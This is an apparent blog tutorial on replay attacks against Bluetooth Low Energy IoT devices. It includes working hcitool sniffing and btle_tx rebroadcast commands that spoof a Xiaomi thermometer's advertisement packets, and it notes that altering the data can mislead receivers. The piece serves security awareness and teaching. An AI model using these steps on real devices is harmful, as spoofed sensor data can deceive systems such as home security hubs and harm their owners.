Unveiling IoT Vulnerabilities: Exploring Replay Attacks on BLE Devices
Iot devices get in roll our daily life and their effects continue to increase every day. New generation of IoT devices started use BLE protocol because of its power efficiency and extend their lifespan. While increasing usage of this devices for everyone and everywhere security of BLE devices one of the main concern. In this write we will see what is replay attack and how to apply a replay attack to them.
What is Replay Attack?
Imagine you have a keyless entry system for your car that uses radio waves (RF) to unlock the doors. When you press the button on your key fob, it sends a unique signal to your car, like a secret handshake. The car recognizes the signal and unlocks the doors.
Now, picture someone with a special device that can capture and replay radio signals. They eavesdrop on your key fob’s signal as you unlock your car. They don’t break any codes, they just record the “handshake.” Later, they can replay that same signal to trick your car into thinking it’s you unlocking it, even though you’re nowhere near!
That’s the essence of an RF replay attack. The attacker intercepts a valid radio signal and then rebroadcasts it at a later time, fooling the receiver (like your car) into thinking it’s a new, legitimate transmission.
Replay Attacks: Risks to Your Everyday IoT Experience
Imagine a smart home security system that relies on BLE-enabled sensors to detect and communicate intrusions. These sensors, strategically placed around the home, continuously transmit data about motion detection, door/window status, and environmental conditions to a central hub, which then triggers appropriate responses such as sounding an alarm or notifying the homeowner.
Now, suppose an attacker successfully executes a replay attack by intercepting and replaying the authentication signals from one of these sensors. By impersonate legitimate sensor signals, the attacker can deceive the central hub into believing that no security breach has occurred when, in fact, an intruder has entered the home.
Demonstration:
Into our demonstration, we will use Xiaomi brand LYWSD03MMC thermometer and try to deceive our receiver. Before we start we need some equipments and softwares.
- a SDR device that has a range for 2.4 Ghz band to obtain signals.
- a antenna
- BLE Thermometer
- Linux OS
- Bluez -> https://www.bluez.org/download/
- Github repository that support the hackrf -> https://github.com/JiaoXianjun/BTLE/tree/master
This repository does lots of things for us that we have to do manually. After have all these we can start with Sniffing.
BLE devices makes advertising to represent themself to other devices through ADV_IND packet. This packet contain some information about the device like its MAC address, batter power etc. In our work, ADV_IND packets of Xiaomi LYWSD03MMC thermometer contains its current temperature, humidity and battery power as percentage. So, we can sniff this data and advertise ourselves as the thermometer, also we can mislead operating devices that works with this data.
Firstly, before we start Bluez must be installed to our PC, if it is not install via the link that I provide.
Sniffing Advertisement Data:
- Open a terminal window and enter the command
sudo hcitool lescan | grep XX:XX:XX:XX:XX:XXReplace XX:XX:XX:XX:XX:XX with the MAC address of your BLE device.
- Wait for the scan to capture the advertisement data, which typically includes device information like MAC address, battery power, and sensor data.
Initiating the Replay Attack:
- Install the BTLE software from the GitHub repository mentioned in the article.
- Open a terminal window and navigate to the BTLE directory.
- Execute the following command:
./btle_tx 37-ADV_IND-TxAdd-0-RxAdd-0-AdvA-a4c130d37e-AdvData-0201050702031802180418-Space-1 r500- Replace a4c130d37e with your device’s MAC address.
- Replace 0201050702031802180418 with the data collected from the hcitool command.
- The Space-1 command specifies the time interval between packet transmissions (in seconds).
- r500 indicates the number of packets to be sent (in this example, 500).
You can see the device with name that you type in with other BLE discovery apps such as LİghBlue or NrfConnect.
Now successfully launch a replay attack.
After that, if you change the ADV data with your own configured ADV data you can manipulate the receivers that uses this data as information. In our example my device sends temperature, humidity and battery information. You can deep int the software and establish a connection with other device just using the informations and correct format(it subject of another article).
Through this demonstration of a replay attack on BLE devices, we’ve highlighted the vulnerabilities that exist in IoT security. It’s important to be aware of these risks and to take steps to protect against them. Always remember that the information presented here is for educational purposes only, and using it for any illegal or harmful activities is strongly discouraged. Stay informed, stay vigilant, and prioritize the security of your IoT devices.
